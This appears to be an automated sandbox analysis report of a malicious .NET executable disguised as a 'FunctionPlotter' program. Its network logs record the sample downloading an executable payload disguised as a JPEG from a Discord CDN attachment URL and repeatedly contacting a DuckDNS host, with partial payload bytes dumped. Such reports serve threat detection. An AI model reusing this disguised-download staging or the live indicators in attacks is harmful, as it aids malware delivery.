                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x20000x26240x2800False0.54365234375data6.15334402761IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rsrc0x60000x3f40x400False0.3994140625data3.18503931448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x80000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_GROUP_ICON0x60a00x6data
                    RT_VERSION0x60a80x34cdata

                    Imports

                    DLLImport
                    mscoree.dll_CorExeMain

                    Version Infos

                    DescriptionData
                    Translation0x0000 0x04b0
                    LegalCopyrightCopyright 2021
                    Assembly Version1.0.0.0
                    InternalNameFunctionPlotter.exe
                    FileVersion1.0.0.0
                    CompanyName
                    LegalTrademarks
                    Comments
                    ProductNameFunctionPlotter
                    ProductVersion1.0.0.0
                    FileDescriptionFunctionPlotter
                    OriginalFilenameFunctionPlotter.exe

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    10/26/21-18:59:37.805891UDP254DNS SPOOF query response with TTL of 1 min. and no authority53495398.8.8.8192.168.2.3
                    10/26/21-18:59:53.714181UDP254DNS SPOOF query response with TTL of 1 min. and no authority53522068.8.8.8192.168.2.3
                    10/26/21-19:00:13.006197UDP254DNS SPOOF query response with TTL of 1 min. and no authority53580458.8.8.8192.168.2.3
                    10/26/21-19:00:20.967859UDP254DNS SPOOF query response with TTL of 1 min. and no authority53574598.8.8.8192.168.2.3
                    10/26/21-19:00:50.296589UDP254DNS SPOOF query response with TTL of 1 min. and no authority53539108.8.8.8192.168.2.3

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 26, 2021 18:59:17.247201920 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.247240067 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.247351885 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.273768902 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.273818016 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.326216936 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.326349974 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.335777998 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.335798025 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.336091042 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.376239061 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.722788095 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.763145924 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.772747040 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.772828102 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.772895098 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773176908 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773190975 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773217916 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773236036 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773482084 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.773498058 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773586988 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.773628950 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773674965 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.773721933 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.773730993 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776501894 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776560068 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776597023 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776621103 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.776626110 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776638031 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776684999 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.776686907 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776696920 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776738882 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.776741982 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776751041 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776798010 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776799917 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.776812077 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.776863098 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.776870966 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789078951 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789120913 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789155960 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789194107 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789253950 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789298058 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789329052 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789338112 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.789357901 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789392948 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.789398909 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.789449930 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.789458036 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790282965 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790314913 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790342093 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790368080 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790370941 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.790386915 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.790411949 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.790436983 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.791177034 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.791273117 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.791332006 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.791347980 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.791393995 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.792265892 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.792352915 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.792363882 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.792404890 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.793154955 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.793224096 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.793333054 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.793406963 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.794281960 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.794342995 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.794380903 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.794395924 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.794409990 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.794521093 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.804795027 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.805124044 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.805128098 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.805143118 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.805274010 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.805850029 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.805910110 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.806797028 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.806853056 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.807759047 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.808120966 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.808140993 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.808198929 CEST49691443192.168.2.3162.159.129.233
                    Oct 26, 2021 18:59:17.808604002 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.808666945 CEST44349691162.159.129.233192.168.2.3
                    Oct 26, 2021 18:59:17.809685946 CEST44349691162.159.129.233192.168.2.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 26, 2021 18:59:17.191879034 CEST5120953192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:17.213689089 CEST53512098.8.8.8192.168.2.3
                    Oct 26, 2021 18:59:37.692476034 CEST4953953192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:37.805891037 CEST53495398.8.8.8192.168.2.3
                    Oct 26, 2021 18:59:37.862895966 CEST5755853192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:37.882729053 CEST53575588.8.8.8192.168.2.3
                    Oct 26, 2021 18:59:45.079998016 CEST5318753192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:45.101207018 CEST53531878.8.8.8192.168.2.3
                    Oct 26, 2021 18:59:45.289836884 CEST5860453192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:45.308212996 CEST53586048.8.8.8192.168.2.3
                    Oct 26, 2021 18:59:53.582288980 CEST5220653192.168.2.38.8.8.8
                    Oct 26, 2021 18:59:53.714180946 CEST53522068.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:01.883228064 CEST5684453192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:01.900144100 CEST53568448.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:12.891922951 CEST5804553192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:13.006196976 CEST53580458.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:20.853653908 CEST5745953192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:20.967859030 CEST53574598.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:27.973202944 CEST5787553192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:27.991539955 CEST53578758.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:36.017663956 CEST5415453192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:36.034369946 CEST53541548.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:43.045185089 CEST5280653192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:43.061810970 CEST53528068.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:50.181987047 CEST5391053192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:50.296588898 CEST53539108.8.8.8192.168.2.3
                    Oct 26, 2021 19:00:56.848726988 CEST6402153192.168.2.38.8.8.8
                    Oct 26, 2021 19:00:56.867213964 CEST53640218.8.8.8192.168.2.3
                    Oct 26, 2021 19:01:02.978128910 CEST6078453192.168.2.38.8.8.8
                    Oct 26, 2021 19:01:02.996295929 CEST53607848.8.8.8192.168.2.3
                    Oct 26, 2021 19:01:10.199405909 CEST5114353192.168.2.38.8.8.8
                    Oct 26, 2021 19:01:10.217719078 CEST53511438.8.8.8192.168.2.3
                    Oct 26, 2021 19:01:18.610572100 CEST5600953192.168.2.38.8.8.8
                    Oct 26, 2021 19:01:18.628911018 CEST53560098.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Oct 26, 2021 18:59:17.191879034 CEST192.168.2.38.8.8.80x6c87Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.692476034 CEST192.168.2.38.8.8.80x17cStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.862895966 CEST192.168.2.38.8.8.80xfb2dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.079998016 CEST192.168.2.38.8.8.80x9676Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.289836884 CEST192.168.2.38.8.8.80x2a08Standard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:53.582288980 CEST192.168.2.38.8.8.80xa8deStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:01.883228064 CEST192.168.2.38.8.8.80x5cb7Standard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:12.891922951 CEST192.168.2.38.8.8.80x39b6Standard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:20.853653908 CEST192.168.2.38.8.8.80x9edfStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:27.973202944 CEST192.168.2.38.8.8.80xb446Standard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:36.017663956 CEST192.168.2.38.8.8.80xad6dStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:43.045185089 CEST192.168.2.38.8.8.80xfaafStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:50.181987047 CEST192.168.2.38.8.8.80x6bbaStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:56.848726988 CEST192.168.2.38.8.8.80xd299Standard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:02.978128910 CEST192.168.2.38.8.8.80xf3cfStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:10.199405909 CEST192.168.2.38.8.8.80x17eeStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:18.610572100 CEST192.168.2.38.8.8.80xb76dStandard query (0)fridaycav.duckdns.orgA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Oct 26, 2021 18:59:17.213689089 CEST8.8.8.8192.168.2.30x6c87No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:17.213689089 CEST8.8.8.8192.168.2.30x6c87No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:17.213689089 CEST8.8.8.8192.168.2.30x6c87No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:17.213689089 CEST8.8.8.8192.168.2.30x6c87No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:17.213689089 CEST8.8.8.8192.168.2.30x6c87No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.805891037 CEST8.8.8.8192.168.2.30x17cNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.882729053 CEST8.8.8.8192.168.2.30xfb2dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.882729053 CEST8.8.8.8192.168.2.30xfb2dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.882729053 CEST8.8.8.8192.168.2.30xfb2dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.882729053 CEST8.8.8.8192.168.2.30xfb2dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:37.882729053 CEST8.8.8.8192.168.2.30xfb2dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.101207018 CEST8.8.8.8192.168.2.30x9676No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.101207018 CEST8.8.8.8192.168.2.30x9676No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.101207018 CEST8.8.8.8192.168.2.30x9676No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.101207018 CEST8.8.8.8192.168.2.30x9676No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.101207018 CEST8.8.8.8192.168.2.30x9676No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:45.308212996 CEST8.8.8.8192.168.2.30x2a08No error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 18:59:53.714180946 CEST8.8.8.8192.168.2.30xa8deNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:01.900144100 CEST8.8.8.8192.168.2.30x5cb7No error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:13.006196976 CEST8.8.8.8192.168.2.30x39b6No error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:20.967859030 CEST8.8.8.8192.168.2.30x9edfNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:27.991539955 CEST8.8.8.8192.168.2.30xb446No error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:36.034369946 CEST8.8.8.8192.168.2.30xad6dNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:43.061810970 CEST8.8.8.8192.168.2.30xfaafNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:50.296588898 CEST8.8.8.8192.168.2.30x6bbaNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:00:56.867213964 CEST8.8.8.8192.168.2.30xd299No error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:02.996295929 CEST8.8.8.8192.168.2.30xf3cfNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:10.217719078 CEST8.8.8.8192.168.2.30x17eeNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)
                    Oct 26, 2021 19:01:18.628911018 CEST8.8.8.8192.168.2.30xb76dNo error (0)fridaycav.duckdns.org185.140.53.3A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • cdn.discordapp.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.349691162.159.129.233443C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    TimestampkBytes transferredDirectionData
                    2021-10-26 16:59:17 UTC0OUTGET /attachments/893177342426509335/897185985257963540/5D70BEC8.jpg HTTP/1.1
                    Host: cdn.discordapp.com
                    Connection: Keep-Alive
                    2021-10-26 16:59:17 UTC0INHTTP/1.1 200 OK
                    Date: Tue, 26 Oct 2021 16:59:17 GMT
                    Content-Type: image/jpeg
                    Content-Length: 1023400
                    Connection: close
                    CF-Ray: 6a453bfbe9c305dc-FRA
                    Accept-Ranges: bytes
                    Age: 1281579
                    Cache-Control: public, max-age=31536000
                    ETag: "6120be0358fed446c42e1349cbecf6f0"
                    Expires: Wed, 26 Oct 2022 16:59:17 GMT
                    Last-Modified: Mon, 11 Oct 2021 18:16:47 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Cf-Bgj: h2pri
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633976207854460
                    x-goog-hash: crc32c=O7ubRQ==
                    x-goog-hash: md5=YSC+A1j+1EbELhNJy+z28A==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 1023400
                    X-GUploader-UploadID: ADPycdsek7nfLCBgq3CiyQdT8Mtqc98BgMYNhM2ST5khIifXuRTmOm87PegTlyuCm40PG1fzO_R3cOMiu2jb9YPIgu2hcteOPQ
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=in63kW3Y8M%2F1URzN%2FV7T2Wgnh0LGATqrHmoOHX8WMB36G8g%2BNTvu3OlhVz5b%2BYLAMa0JPDk4trASREUJpVXXgNnUZklimuFsjanZnkT0mwgIUs%2Fz0yP1C1qINoTwjnNmeVEiRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                    2021-10-26 16:59:17 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                    2021-10-26 16:59:17 UTC1INData Raw: 37 37 20 39 30 20 31 34 34 20 30 20 33 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 35 35 20 32 35 35 20 30 20 30 20 31 38 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 31 32 38 20 30 20 30 20 30 20 31 34 20 33 31 20 31 38 36 20 31 34 20 30 20 31 38 30 20 39 20 32 30 35 20 33 33 20 31 38 34 20 31 20 37 36 20 32 30 35 20 33 33 20 38 34 20 31 30 34 20 31 30 35 20 31 31 35 20 33 32 20 31 31 32 20 31 31 34 20 31 31 31 20 31 30 33 20 31 31 34 20 39 37 20 31 30 39 20 33 32 20 39 39 20 39 37 20 31 31 30 20 31 31 30 20 31 31 31 20 31 31 36 20
                    Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                    2021-10-26 16:59:17 UTC2INData Raw: 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 34 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 34 20 30 20 30 20 30 20 36 34 20 30 20 30 20 30 20 36 36 20 30 20 30 20 30 20 36 38 20 30 20 30 20 30 20 37 30 20 30 20 30 20 30 20 37 32 20 30 20 30 20 30 20 37 34 20 30 20 30 20 30 20 37 36 20 30 20 30 20 30 20 39 32 20 30 20 30 20 30 20 39 34 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 38 20 30 20 30 20 30 20 31 32 20 30 20 30 20 30 20 31 36 20 30 20 30 20 30 20 32 32 20 30 20 30 20 30 20 32 38 20 30 20 30 20 30 20 33 32 20 30 20 30 20 30 20 34 30 20 30 20 30 20 30 20 34 34 20 30 20 30 20 30 20 35 32 20 30 20 30 20
                    Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 22 0 0 0 24 0 0 0 64 0 0 0 66 0 0 0 68 0 0 0 70 0 0 0 72 0 0 0 74 0 0 0 76 0 0 0 92 0 0 0 94 0 0 0 0 0 0 0 8 0 0 0 12 0 0 0 16 0 0 0 22 0 0 0 28 0 0 0 32 0 0 0 40 0 0 0 44 0 0 0 52 0 0
                    2021-10-26 16:59:17 UTC4INData Raw: 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 38 30 20 34 38 20 34 38 20 31 31 34 20 38 37 20 38 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34
                    Data Ascii: 84 114 117 109 80 48 48 114 87 85 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 119 109 124 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114
